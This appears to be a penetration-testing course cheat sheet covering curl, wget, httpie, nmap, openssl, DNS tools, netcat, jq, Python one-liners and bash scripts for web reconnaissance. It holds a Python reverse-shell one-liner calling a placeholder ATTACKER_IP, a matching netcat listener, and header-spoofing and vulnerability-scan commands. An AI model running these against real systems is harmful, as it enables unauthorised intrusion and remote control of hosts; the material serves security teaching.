
Essentials CLI Tools

Task 1
Command Line Tools

1. curl Deep Dive

1.1 Basic Requests

# Simple GET
curl https://target.com

# Show response headers (-I sends HEAD; a handler that treats HEAD differently from GET
# may return other headers or another status, so confirm with -v on a GET when it matters)
curl -I https://target.com

# Verbose output (full request/response; the TLS handshake details go to stderr)
curl -v https://target.com

# Silent mode with specific output: only the status code. 000 means no HTTP response
# at all (DNS, connect or TLS failure), not a server error
curl -s -o /dev/null -w "%{http_code}\n" https://target.com

# Follow redirects (curl does not follow them unless told to)
curl -L https://target.com

# Max redirects (caps the chain so a redirect loop terminates)
curl -L --max-redirs 5 https://target.com

1.2 Request Methods and Data

# POST with form data (-d on its own already makes curl send a POST with
# Content-Type: application/x-www-form-urlencoded; -X POST is redundant here and,
# combined with -L, keeps forcing POST on every redirect hop)
curl -X POST -d "username=admin&password=test" https://target.com/login

# POST with JSON (-d sends the body verbatim; the header is what tells the server it is JSON)
curl -X POST -H "Content-Type: application/json" \
     -d '{"username":"admin","password":"test"}' https://target.com/api/login

# PUT request
curl -X PUT -H "Content-Type: application/json" \
     -d '{"role":"admin"}' https://target.com/api/users/1

# DELETE request
curl -X DELETE https://target.com/api/users/1

# PATCH request ("[email protected]" below is an extraction artifact; the original
# value was presumably an e-mail address)
curl -X PATCH -H "Content-Type: application/json" \
     -d '{"email":"[email protected]"}' https://target.com/api/users/1

# File upload as multipart/form-data. "[email protected]" is an extraction artifact: the
# real form is -F "fieldname=@/path/to/file" — the @ makes curl read the file into the
# part; ";type=" overrides the Content-Type curl would guess for it
curl -F "[email protected]" https://target.com/upload
curl -F "[email protected];type=image/jpeg" https://target.com/upload

1.3 Headers and Authentication

# Custom headers (the Bearer value is a placeholder; X-Forwarded-For and User-Agent are
# client-controlled, so nothing server-side should base access decisions on them)
curl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9..." \
     -H "X-Forwarded-For: 127.0.0.1" \
     -H "User-Agent: Googlebot" https://target.com

# Basic auth (a password on the command line ends up in shell history and in `ps`;
# `-u admin` without the password makes curl prompt for it instead)
curl -u admin:password https://target.com/admin

# Cookie handling: -b sends cookies, -c writes the server's Set-Cookie values to a jar
# file; using both on the login request keeps the session for the calls that follow
curl -b "session=abc123; token=xyz" https://target.com
curl -c cookies.txt -b cookies.txt https://target.com/login

# Referer header (-e sets Referer; some endpoints compare it against their own origin)
curl -e "https://target.com/dashboard" https://target.com/api/data

1.4 Proxy and SSL

# Through Burp proxy (-k is only needed because Burp's CA is not trusted; exporting
# that CA and passing it with --cacert keeps verification on instead of disabling it)
curl -x http://127.0.0.1:8080 -k https://target.com

# SOCKS proxy (--socks5 resolves the hostname locally before connecting through the
# proxy; --socks5-hostname hands resolution to the proxy, which is what Tor expects)
curl --socks5 127.0.0.1:9050 https://target.com

# Ignore SSL errors (disables certificate verification entirely, so any on-path host
# can impersonate the target for this request)
curl -k https://self-signed.target.com

# Specify CA certificate (verify against a private CA instead of the system store)
curl --cacert /path/to/ca.pem https://target.com

# Client certificate (mutual TLS; keep the key file readable only by your own user)
curl --cert client.pem --key client-key.pem https://target.com

2. wget

# Download file
wget https://target.com/file.pdf

# Mirror entire website (-m recursive with timestamps and no depth limit, -p page
# requisites, -E add .html extensions, -k rewrite links for local browsing; this
# fetches everything reachable, so it is slow and very visible in the server's logs)
wget -m -p -E -k https://target.com

# Download with custom headers (the cookie value is visible in `ps` and shell history
# for the duration of the run)
wget --header="Cookie: session=abc" https://target.com/admin

# Spider mode (don't download, just check links; -r still walks every link it finds)
wget --spider -r https://target.com

3. httpie

# GET request (the method keyword is optional: httpie defaults to GET, or to POST
# when request items are given)
http GET https://target.com/api/users

# POST with JSON (default): key=value items are serialised into a JSON body
http POST https://target.com/api/login username=admin password=test

# Custom headers: Name:value items become request headers (replace TOKEN with the real one)
http GET https://target.com/api/data "Authorization: Bearer TOKEN"

# Form data: --form switches the body to application/x-www-form-urlencoded
http --form POST https://target.com/login username=admin password=test

# Follow redirects (httpie does not follow them by default)
http --follow https://target.com

4. nmap for Web Services

# Basic web port scan (-sV probes each open port for service and version; the list
# covers the usual HTTP(S) and development-server ports)
nmap -sV -p 80,443,8080,8443,3000,5000,8000,8888 target.com

# Aggressive service detection (-p- is all 65535 ports, -sC the default script set;
# expect this to take a long time per host)
nmap -sV -sC -p- target.com

# Web-specific NSE scripts (one script per run keeps the output readable;
# --script also accepts a comma-separated list)
nmap --script http-title -p 80,443,8080 target.com
nmap --script http-headers -p 80,443 target.com
nmap --script http-methods -p 80 target.com
nmap --script http-enum -p 80 target.com
nmap --script ssl-enum-ciphers -p 443 target.com
nmap --script http-git -p 80 target.com
nmap --script http-robots.txt -p 80 target.com

# Scan for common web vulns (these scripts send active probes: they are noisy and
# can disrupt fragile services)
nmap --script "http-vuln-*" -p 80,443 target.com

# Fast scan of top ports (-F limits the scan to nmap's 100 most common ports)
nmap -F -sV target.com

5. openssl

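# Test SSL/TLS connection
# </dev/null: s_client reads stdin after the handshake and otherwise sits waiting for
# input (the piped forms below never returned until Ctrl-D or a server timeout).
# -servername sends SNI, so a virtual-hosted server returns the certificate for this
# name instead of its default one.
openssl s_client -connect target.com:443 -servername target.com </dev/null

# Check certificate details (stderr silenced so only the PEM block reaches x509)
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -text

# Test specific TLS version (a handshake failure here means that version is not offered)
openssl s_client -connect target.com:443 -servername target.com -tls1_2 </dev/null
openssl s_client -connect target.com:443 -servername target.com -tls1_3 </dev/null

# Check certificate dates
openssl s_client -connect target.com:443 -servername target.com </dev/null 2>/dev/null | openssl x509 -noout -dates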

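# Generate hash (printf '%s' instead of echo -n: echo's -n handling is not portable
# across shells, and a stray trailing newline silently changes the digest)
printf '%s' "password" | openssl dgst -md5
printf '%s' "password" | openssl dgst -sha256

# Base64 encode/decode (the decoder input keeps its trailing newline: some OpenSSL
# versions do not flush the last line of base64 without one)
printf '%s' "admin:password" | openssl base64
printf '%s\n' "YWRtaW46cGFzc3dvcmQ=" | openssl base64 -d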

6. DNS Tools

# dig (+short trims the output to the answer values when that is all you need)
dig target.com A
dig target.com MX
dig target.com TXT
dig target.com NS
dig target.com ANY              # most servers now answer ANY with a minimal response (RFC 8482)
dig @8.8.8.8 target.com        # Specific DNS server
dig -x 93.184.216.34            # Reverse DNS
dig target.com AXFR @ns1.target.com  # Zone transfer; a correctly configured server refuses it, so success is a finding for the zone owner to fix

# nslookup
nslookup target.com
nslookup -type=MX target.com
nslookup -type=TXT target.com

# host (-t selects the record type; a trailing argument is the server to ask)
host target.com
host -t MX target.com
host -t AXFR target.com ns1.target.com

# whois (registrar and registrant data for a domain; allocation and abuse contact for an IP)
whois target.com
whois 93.184.216.34

7. netcat

# Connect to a port (-v reports whether the connection succeeded; type a request by hand)
nc -v target.com 80

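# Send HTTP request manually (printf instead of echo -e: echo's escape handling differs
# between shells. Connection: close makes the server close the socket after the
# response, so nc returns instead of sitting on an HTTP/1.1 keep-alive connection)
printf 'GET / HTTP/1.1\r\nHost: target.com\r\nConnection: close\r\n\r\n' | nc target.com 80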

# Listen for reverse shell (-l listen, -v verbose, -n no DNS, -p local port; the
# traffic is clear text, so everything typed into the session is visible on the wire)
nc -lvnp 4444

# Port scanning (-z connects without sending data; the a-b range syntax is the
# OpenBSD nc form — ncat and traditional nc take different flags, check your variant)
nc -zv target.com 1-1000

# File transfer (unencrypted and unauthenticated: whoever connects first gets the
# socket, so compare a checksum of the file on both ends)
nc -lvnp 4444 > received_file    # Receiver
nc target.com 4444 < file_to_send # Sender

# Banner grabbing (some services announce themselves on connect, e.g. SSH on 22;
# HTTP stays silent until it receives a request)
nc -v target.com 80
nc -v target.com 22

8. jq for JSON Processing

# Pretty print JSON (jq . also validates: an HTML error page or truncated body fails
# here instead of being misread further down a pipeline)
curl -s https://target.com/api/users | jq .

# Extract specific field (.[] iterates a top-level array; add -r to print raw strings without quotes)
curl -s https://target.com/api/users | jq '.[].username'

# Filter results (select keeps only the objects whose role is exactly "admin")
curl -s https://target.com/api/users | jq '.[] | select(.role == "admin")'

# Count results ('. | length' is equivalent to plain 'length')
curl -s https://target.com/api/users | jq '. | length'

# Extract nested data (a missing path yields null rather than an error)
curl -s https://target.com/api/users | jq '.[0].profile.email'

# Create new JSON (object addition merges keys; the right-hand value wins on a clash)
echo '{}' | jq '. + {"username":"admin","role":"admin"}'

9. Python One-Liners

# Simple HTTP server (serves the current directory on all interfaces, including
# anything sensitive lying in it; --bind 127.0.0.1 restricts it to localhost)
python3 -m http.server 8888

# URL encode (quote() leaves '/' unescaped by default; pass safe='' to encode everything)
python3 -c "import urllib.parse; print(urllib.parse.quote('<script>alert(1)</script>'))"

# URL decode (unquote() does not turn '+' into a space; unquote_plus() does)
python3 -c "import urllib.parse; print(urllib.parse.unquote('%3Cscript%3E'))"

# Base64 encode/decode (standard alphabet; JWT segments need the urlsafe_* variants)
python3 -c "import base64; print(base64.b64encode(b'admin:password').decode())"
python3 -c "import base64; print(base64.b64decode('YWRtaW46cGFzc3dvcmQ=').decode())"

# Generate MD5/SHA hash of the literal bytes (no trailing newline, unlike `echo x | md5sum`)
python3 -c "import hashlib; print(hashlib.md5(b'password').hexdigest())"
python3 -c "import hashlib; print(hashlib.sha256(b'password').hexdigest())"

# Quick HTTP request (requests is a third-party package — pip install requests; it
# verifies TLS certificates by default, unlike curl -k)
python3 -c "import requests; r=requests.get('https://target.com'); print(r.status_code, len(r.text))"

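# JWT decode (without verification): prints the header and payload, ignores the signature.
# JWT segments are base64url ('-' and '_', padding stripped). base64.b64decode() silently
# drops characters outside the standard alphabet, so a segment containing '-' or '_'
# decoded to garbage; urlsafe_b64decode handles the alphabet and '=' * (-len % 4)
# restores exactly the padding that was stripped.
jwt_decode() {
    python3 -c "import base64,json,sys; print(*(json.loads(base64.urlsafe_b64decode(p + '=' * (-len(p) % 4))) for p in sys.argv[1].split('.')[:2]), sep='\n')" "$1"
}
jwt_decode "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiIxIn0.sig"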

# Reverse shell (ATTACKER_IP is a placeholder for the host running the nc listener from
# section 7; the interpreter opens the socket and dup2()s it over fds 0-2 before spawning
# /bin/sh — that interpreter → outbound socket → shell chain is the behaviour EDR and
# auditd rules are typically written to catch)
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

10. Bash Scripting for Automation

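#!/bin/bash
# Quick subdomain checker
# Usage: ./subcheck.sh target.com   (candidate labels, one per line, in subdomains.txt)
#######################################
# Resolve each label read from stdin under the given domain and print the ones
# that have an A record.
# Arguments: $1 - base domain
# Outputs:   "[+] sub.domain -> ip[ ip...]" per resolving name, on stdout
# Returns:   2 when no domain was given, otherwise 0
#######################################
check_subdomains() {
    local domain=$1 sub ip
    [[ -n "$domain" ]] || { printf 'usage: %s domain < subdomains.txt\n' "$0" >&2; return 2; }
    # IFS= and -r keep each label byte-for-byte; the || [[ -n ]] clause still processes
    # a last line that has no trailing newline
    while IFS= read -r sub || [[ -n "$sub" ]]; do
        [[ -z "$sub" ]] && continue          # skip blank lines in the wordlist
        ip=$(dig +short "$sub.$domain" A)
        if [[ -n "$ip" ]]; then
            # +short may return several lines (CNAME chain, several A records); join them
            printf '[+] %s.%s -> %s\n' "$sub" "$domain" "${ip//$'\n'/ }"
        fi
    done
}
check_subdomains "$1" < subdomains.txt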

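# Status code checker (one URL per line in urls.txt)
#######################################
# Print the HTTP status code for every URL read from stdin.
# Outputs:   "<code> <url>" per line on stdout; 000 means no HTTP response was
#            received (DNS, connect, TLS failure or timeout)
# Returns:   0
#######################################
check_status() {
    local url code
    while IFS= read -r url || [[ -n "$url" ]]; do
        [[ -z "$url" ]] && continue
        # Timeouts keep one unresponsive host from stalling the whole list; the
        # original loop waited indefinitely
        code=$(curl -s -o /dev/null -w "%{http_code}" --connect-timeout 10 --max-time 30 -- "$url")
        printf '%s %s\n' "$code" "$url"
    done
}
check_status < urls.txt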

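# Header checker
# Usage: ./headers.sh https://target.com   (give the final https:// URL: HSTS is only
# meaningful on the TLS response, and an http:// URL usually just returns a redirect)
#######################################
# Report which required security headers are present in a raw response header dump.
# Inputs:    response headers on stdin (as produced by curl -D -)
# Outputs:   "[+] Name: value" or "[-] MISSING: Name" per required header, on stdout
# Returns:   0
#######################################
report_security_headers() {
    local headers name line
    local -a required=(X-Frame-Options Content-Security-Policy Strict-Transport-Security X-Content-Type-Options)
    headers=$(cat)
    for name in "${required[@]}"; do
        # Anchor to the line start and require the ':' so a substring cannot pass:
        # with a bare grep, Content-Security-Policy-Report-Only counted as a CSP,
        # and X-Content-Type-Options matched inside other header names
        line=$(grep -i -m 1 -- "^$name:" <<<"$headers" | tr -d '\r')
        if [[ -z "$line" ]]; then
            printf '[-] MISSING: %s\n' "$name"
        else
            printf '[+] %s\n' "$line"
        fi
    done
}

#######################################
# Fetch the URL once and report on its security headers.
# Arguments: $1 - URL to check
# Returns:   2 when no URL was given, 1 when curl failed, otherwise 0
#######################################
check_security_headers() {
    local url=$1 headers
    [[ -n "$url" ]] || { printf 'usage: %s https://target.com\n' "$0" >&2; return 2; }
    # One GET rather than one HEAD per header: some servers omit security headers on
    # HEAD responses, and -D - writes the response headers to stdout for grepping
    headers=$(curl -sS -o /dev/null -D - -- "$url") || return 1
    report_security_headers <<<"$headers"
}

check_security_headers "$1"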